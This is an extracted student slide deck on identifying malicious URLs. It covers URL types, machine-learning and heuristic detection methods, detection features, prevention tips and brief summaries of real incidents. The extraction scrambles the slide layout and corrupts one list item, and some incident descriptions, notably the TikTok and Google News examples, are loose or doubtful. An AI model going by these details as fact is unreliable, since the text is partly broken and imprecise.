Case Study of Identifying

Malicious URLS -PRESENTED BY

S.CHANDRIKA & M.MYTHRI
 INTRODUCTION
Project analysis slide 3
What is a The HOW TO
malicious Importance of PROTECT THE
URL? Detecting DATA?
Malicious URLs  Use Security
A 1. Protecting Sensitive Software
malicious Information  Enable
URL is a 2. Preventing Malware Browser
link Infections .
Security
created 3. Enhancing User Features
with the Trust  Use URL Sca
purpose 4. Mitigating Financial nners
of Losses  Enable Multi-
promotin 5. Staying Ahead of Factor Authe
g scams, Evolving Threats ntication (MF
attacks, A)
and
frauds.
Project analysis slide 2
Phishing URLs Typosquatting URLs

Malware URLs TYPES OF

MALICIOUS Lookalike Domains
URLS

Command and Control (C&C Drive-by Download URLs

) URLs
WAYS TO DETECT MALICIOUS URLS

Project analysis slide 4

1.Malicious URL Detection Using Machine
Learning:
Malicious URLs pose a significant threat to cybersecurity, leading to
phishing attacks, malware distribution, and other malicious activities.
Traditional methods like blacklisting are often insufficient due to their
inability to detect newly generated malicious URLs.
Methodology
1.Data Collection: A large dataset of URLs, both benign and
malicious, was collected. Features such as domain registration details,
host properties, and lexical characteristics of the URLs were extracted.
2.Feature Extraction: Over 30,000 features were extracted from the
URLs, including information from blacklists, domain registration details,
host properties, and lexical features.
3.Model Training: Machine learning classifiers such as Logistic
Regression with L1 regularization were used to classify URLs. The
model was trained to distinguish between benign and malicious URLs
based on the extracted features.
4.Evaluation: The model’s performance was evaluated using metrics
like accuracy, precision, recall, and F1-score.
The Logistic Regression model achieved an accuracy of over 86.5% 1.
Results
The machine learning approach demonstrated high accuracy in
detecting malicious URLs, significantly outperforming traditional
blacklisting methods. The study highlighted the importance of using a
diverse set of features to improve detection rates.
Conclusion
This case study illustrates the effectiveness of machine learning
techniques in enhancing cybersecurity measures by accurately
detecting malicious URLs. The approach can be further improved by
incorporating more advanced models and real-time data collection
methods.
Detecting malicious URLs often involves
using various machine learning algorithms.

Project analysis slide 5

Here are some commonly used ones:

1.Logistic Regression: This algorithm is used

for binary classification problems and can
effectively distinguish between malicious and
benign URLs based on features extracted from
the URLs.
2.Decistrees and merges them to get a more
accurate and stable prediction.
3.Support Vector Machines (SVM): SVMs
are effective in high-dimensional spaces and
are used to classify URLs by finding the
hyperplane that best separates the data into
different classes.
4.Naive Bayes
: This probabilistic classifier is based on Bayes’
theorem and is particularly useful for text class
ification tasks, such as analyzing the content of
URLs
.
5.K-Nearest Neighbors (KNN): This
algorithm classifies URLs based on the majority
class among the k-nearest neighbors in the
feature space.
Techniques for Identifying Malicious URLs
1.Blacklisting

Project analysis slide 7

•Description: This technique involves maintaining a list of known malicious URLs. When a URL is accessed, it is checked against this list.
•Pros: Simple and effective for known threats.
•Cons: Ineffective against new or unknown malicious URLs.

2. Heuristic Analysis
•Description: This method analyzes the URL structure and behavior to identify suspicious patterns. For example, URLs with excessive special characters or unu
domain names might be flagged.
•Pros: Can detect new threats based on patterns.
•Cons: May produce false positives.

3. Machine Learning
•Description: Machine learning models are trained to recognize features of malicious URLs. These models can then predict whether a new URL is malicious bas
its characteristics.
•Pros: Highly effective and adaptable to new threats.
•Cons: Requires a large dataset and computational resources for training.

4. Lexical Analysis
•Description: This technique examines the URL’s text, such as length, use of special characters, and suspicious keywords.
•Pros: Quick and easy to implement.
•Cons: May not be sufficient on its own.

5. Content-Based Analysis
•Description: This involves analyzing the content of the webpage that the URL points to. Techniques include checking for malicious scripts, unusual redirects, a
phishing content.
•Pros: Directly examines the threat.
•Cons: Requires fetching and analyzing the webpage content, which can be resource-intensive.

6.Hybrid Approaches
“ to improve detection accuracy. For example, using both lexical and host-based analysis.
•Description: Combining multiple techniques
•Pros: Higher accuracy and robustness.
•Cons: More complex to implement and maintain.
6
 FEATURES USED IN DETECTION
Project analysis slide 8
Lexical Features:
 URL Length: Longer URLs can
be suspicious.
 Special Characters: Presence
of unusual characters
like @, %, or multiple //.
 Keyword Analysis: Use of
misleading or suspicious
keywords (e.g., “login”,
“secure”).
 HTML Content: Analysis of the
webpage’s HTML for malicious
scripts.
 Redirects: Unusual or multiple
redirects can indicate phishing.
 Embedded Links: Presence of
suspicious links within the content
Content-Based Features:
Host-Based
Features:
 Domain Age: Newly registered
domains can be more suspicious.
 WHOIS Information: Details
about the domain’s registration.
 IP Address: Reputation and
geolocation of the IP address
 Feature Engineering: Creating new
features from existing data to improve
model performance.
 Model Training: Using labeled datasets
to train models to recognize malicious
URLs.
 Anomaly Detection: Identifying URLs
Machine
that deviateLearning
from normal patterns.
Features:
 HOW TO PREVENT THIS?
Project analysis slide 6
Preventing malicious emails, spam, and URLs involves a combination of best practices, tools, and
awareness. Here are some effective strategies:

. 1. Use Email Filters and. Spam Protection .

•Email Filters: Most email services like Gmail and Outlook have built-in spam filters. Ensure
these are enabled and configured correctly.
•Report Spam: Regularly report spam emails to help improve the filter’s accuracy.
•Block Senders: Block email addresses that frequently send spam.
2. Be Cautious with Links and Attachments
•Hover Over Links: Before clicking, hover over links to see the actual URL. Look for suspicious
or unfamiliar domains.
•Avoid Unknown Attachments: Do not open attachments from unknown or unexpected
sources.
3. Enable Multi-Factor Authentication (MFA)
•MFA: Use multi-factor authentication for your email and other online accounts to add an extra
layer of security.
4. Keep Software Updated
•Regular Updates: Ensure your operating system, browsers, and security software are up to
date to protect against known vulnerabilities.
5. Use Security Software
•Antivirus Programs: Install and regularly update antivirus and anti-malware software.
•Browser Extensions: Use browser extensions that warn you about malicious websites, such as
those provided by Google Safe Browsing or similar services.
6. Educate Yourself and Others
•Phishing Awareness: Learn to recognize phishing attempts. Look for red flags like urgent
requests, unfamiliar senders, and. poor grammar.
•Training: Participate in or provide cybersecurity training to stay informed about the latest
threats.
7. Use Strong, Unique Passwords
•Password Managers: Use a password manager to generate and store strong, unique
passwords for each of your accounts.
 CASE STUDY ANALYSIS
Project analysis slide 10
A REAL-WORLD EXAMPLES OF MALICIOUS URL ATTACKS & HOW
WAS IT DETECTED
1. TikTok CSRF Attack
Attack: In 2020, ByteDance, the parent company of TikTok,
discovered a vulnerability that allowed attackers to send
messages containing malware to TikTok users.
This malware could perform Cross-Site Request Forgery (CSRF) or
Cross-Site Scripting (XSS) attacks, causing other user accounts to
submit requests on their behalf
1
.
Detection: The vulnerability was reported by security
researchers who noticed unusual behavior and traffic patterns.
TikTok’s security team then analyzed the reports and patched the
vulnerability within three weeks.
2. SolarWinds Supply Chain Attack
Attack: In December 2020, it was revealed that the software
company SolarWinds had been targeted in a supply chain attack.
Attackers implanted malicious code into an update of the compan
y’s network management software, affecting several US governm
ent agencies and numerous private companies
2
.
Detection: The attack was detected by cybersecurity firm
FireEye, which noticed unusual activity in its own network. Further
investigation revealed the compromised SolarWinds software
update, leading to a broader investigation and response.
3. Twitter Spear Phishing Attack
Attack: In July 2020, Twitter experienced a major security breach
where attackers used spear phishing techniques to gain access to
internal tools.
They then posted tweets from high-profile accounts, promoting a
cryptocurrency scam
3
.
4. Zoom Credential Stuffing Attack
Attack: In early 2020, Zoom users were targeted in a credential stuffing
attack, where attackers used previously leaked credentials to gain
access to Zoom accounts.
Detection: The attack was detected through user reports of
unauthorized access and unusual login activity. Zoom’s security team
implemented additional security measures, including mandatory
password resets and two-factor authentication (2FA)
5.Google News Phishing Attack
Attack: In 2016, attackers used a URL that looked like “ɢoogle.news” instead
of “google.news” to trick users into thinking they were visiting the
legitimate Google News site. This type of attack, known as a homograph
attack, uses characters that look similar to those in the legitimate URL
Thank You
ANY QUERIES?

ELURU COLLEGE OF ENGINEERING &